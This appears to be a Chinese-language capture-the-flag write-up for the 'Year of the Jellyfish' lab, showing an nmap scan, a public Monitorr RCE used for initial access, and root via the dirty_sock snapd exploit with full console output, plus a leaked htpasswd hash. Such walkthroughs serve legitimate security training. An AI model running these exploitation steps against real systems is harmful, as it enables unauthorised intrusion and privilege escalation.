Skip to main content

Year of the Jellyfish

image-20240709201136220

端口扫描

root@ip-10-10-126-21:~/yearofthejellyfish# nmap -sTCV -p 21,22,80,443,8000,896,22222 --min-rate 1000 3.250.181.103

Starting Nmap 7.60 ( https://nmap.org ) at 2023-10-22 08:23 BST
Nmap scan report for ec2-3-250-181-103.eu-west-1.compute.amazonaws.com (3.250.181.103)
Host is up (0.00057s latency).

PORT      STATE    SERVICE  VERSION
21/tcp    open     ftp      vsftpd 3.0.3
22/tcp    open     ssh      OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|_  2048 46:b2:81:be:e0:bc:a7:86:39:39:82:5b:bf:e5:65:58 (RSA)
80/tcp    open     http     Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Did not follow redirect to https://robyns-petshop.thm/
443/tcp   open     ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Robyn's Pet Shop
| ssl-cert: Subject: commonName=robyns-petshop.thm/organizationName=Robyns Petshop/stateOrProvinceName=South West/countryName=GB
| Subject Alternative Name: DNS:robyns-petshop.thm, DNS:monitorr.robyns-petshop.thm, DNS:beta.robyns-petshop.thm, DNS:dev.robyns-petshop.thm
| Not valid before: 2023-10-22T07:12:22
|_Not valid after:  2024-10-21T07:12:22
|_ssl-date: TLS randomness does not represent time
896/tcp   filtered unknown
8000/tcp  open     http-alt
| fingerprint-strings: 
|   GenericLines: 
|     HTTP/1.1 400 Bad Request
|     Content-Length: 15
|_    Request
22222/tcp open     ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8d:99:92:52:8e:73:ed:91:01:d3:a7:a0:87:37:f0:4f (RSA)
|   256 5a:c0:cc:a1:a8:79:eb:fd:6f:cf:f8:78:0d:2f:5d:db (ECDSA)
|_  256 0a:ca:b8:39:4e:ca:e3:cf:86:5c:88:b9:2e:25:7a:1b (EdDSA)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8000-TCP:V=7.60%I=7%D=10/22%Time=6534CDE1%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,3F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Length:\x
SF:2015\r\n\r\n400\x20Bad\x20Request");
Service Info: Host: robyns-petshop.thm; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.94 seconds

80/443

从端口扫描的结果中我发现了以下一些域以及子域:

  • robyns-petshop.thm
  • monitorr.robyns-petshop.thm
  • beta.robyns-petshop.thm : 一般这里会出现漏洞但是从扫描结果中并没有获取到什么, 因此估计是 rabbit holes
  • dev.robyns-petshop.thm :

之后进行目录扫描, 也没有发现什么新奇的内容, 当我访问 monitorr.robyns-petshop.thm 子域时发现其泄露了 CMS 以及版本并且我们可以找到对应的 EXP monitorr-v1.7.6m-rce

image-20240709201205449

从 EXP 中我们可以知道这是通过上传一个 PHP 代码进行的 RCE 漏洞

后渗透

www-data

image-20240709201235238

image-20240709201239118

www-data —> root

之后执行 linpeas.sh 程序我们可以在 SUID 中发现一些特殊的内容

image-20240709201247515

查看对应的 CVE 可以知道这是通过添加一个新的 SUDO 用户组的用户来完成提权的操作

GitHub - initstring/dirty_sock: Linux privilege escalation exploit via snapd (CVE-2019-7304)

下载对应的 EXP , 并进行执行我们可以发现成功执行了

(remote) www-data@petshop:/tmp$ python3 dirty_sockv2.py 

      ___  _ ____ ___ _   _     ____ ____ ____ _  _ 
      |  \ | |__/  |   \_/      [__  |  | |    |_/  
      |__/ | |  \  |    |   ___ ___] |__| |___ | \_ 
                       (version 2)

//=========[]==========================================\\
|| R&D     || initstring (@init_string)                ||
|| Source  || https://github.com/initstring/dirty_sock ||
|| Details || https://initblog.com/2019/dirty-sock     ||
\\=========[]==========================================//

[+] Slipped dirty sock on random socket file: /tmp/rrttmlpmcv;uid=0;
[+] Binding to socket file...
[+] Connecting to snapd API...
[+] Deleting trojan snap (and sleeping 5 seconds)...
[+] Installing the trojan snap (and sleeping 8 seconds)...
[+] Deleting trojan snap (and sleeping 5 seconds)...

********************
Success! You can now `su` to the following account and use sudo:
   username: dirty_sock
   password: dirty_sock
********************

(remote) www-data@petshop:/tmp$ su dirty_sock
Password: 
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

dirty_sock@petshop:/tmp$ id
uid=1001(dirty_sock) gid=1001(dirty_sock) groups=1001(dirty_sock),27(sudo)
dirty_sock@petshop:/tmp$ sudo -l
[sudo] password for dirty_sock: 
Matching Defaults entries for dirty_sock on petshop:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dirty_sock may run the following commands on petshop:
    (ALL : ALL) ALL
    (ALL : ALL) ALL
dirty_sock@petshop:/tmp$ sudo /bin/bash -p
root@petshop:/tmp# id
uid=0(root) gid=0(root) groups=0(root)

Rabbit holes

robyn

在执行 linpeas.sh 时我们可以发现一个特殊的文件 /etc/apache2/htpasswd 其中告诉我们用户 robyn 的 hash , 但是我们无法解密

(remote) www-data@petshop:/tmp$ cat /etc/apache2/htpasswd 
robyn:$apr1$tMFlj08b$5VCOhI2see0L0WRU8Mn.b.